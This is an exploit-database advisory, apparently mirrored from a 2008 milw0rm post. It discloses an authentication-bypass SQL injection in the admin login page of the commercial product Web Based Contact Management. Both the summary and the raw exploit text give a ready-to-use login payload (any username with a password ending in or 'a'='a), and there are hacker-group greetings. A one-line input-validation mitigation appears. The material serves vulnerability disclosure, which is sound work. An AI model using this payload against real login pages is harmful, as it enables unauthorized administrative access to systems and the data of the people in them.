Web Based Contact Management (Auth Bypass) SQL Injection Vulnerability

vendor:

Web Based Contact Management

by:

b3hz4d

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Web Based Contact Management

Affected Version From: All versions

Affected Version To: All versions

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Web Based Contact Management (Auth Bypass) SQL Injection Vulnerability

Admin login page of Web Based Contact Management is vulnerable to SQL Injection. All versions (SOHO Version, Standard Version, Enterprise Version) are vulnerable. An attacker can bypass authentication by using the username 'anything' and the password 'delta' or 'a'='a'.

Mitigation:

Input validation should be used to prevent SQL Injection attacks.

Source

Exploit-DB raw data:

        +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
        +                                                                         +
        + Web Based Contact Management (Auth Bypass) SQL Injection Vulnerability  +
        +                                                                         +
        +                        Discovered by b3hz4d                             +
        +                                                                         +
        +                        WwW.DeltaHacking.Net                             +
        +                                                                         +
        +                                                                         +
        +                                                                         +
        +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
                                  

                              APA Center of Yazd University   
                                 (https://www.ircert.cc)    

		
AUTHOR : b3hz4d (Seyed Behzad Shaghasemi)
DATE   : 03 Dec 2008
SITE   : WwW.DeltaHacking.Net
CONTACT: behzad_sh_66@yahoo.com

#####################################################

APPLICATION   : Web Based Contact Management
DOWNLOAD(199$): http://www.aliensoftcorp.com/contactmanager.htm
VENDOR        : http://www.aliensoftcorp.com/
DEMO          : http://www.aliensoftcorp.com/contactmanager.htm

#####################################################


[+] vuln    : 
              
              Admin login page
              
              All versions (SOHO Version, Standard Version, Enterprise Version) are vulnerable.
              
              All Demo links are here:
              
              http://www.aliensoftcorp.com/contactmanager.htm	  

[+] Exploit : 
              USER: anything

	      PASS: delta' or 'a'='a
 
                
##########################################################################################################

# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all member in DeltaHacking.Net & Snoop-Security.Com #

##########################################################################################################

# milw0rm.com [2008-12-03]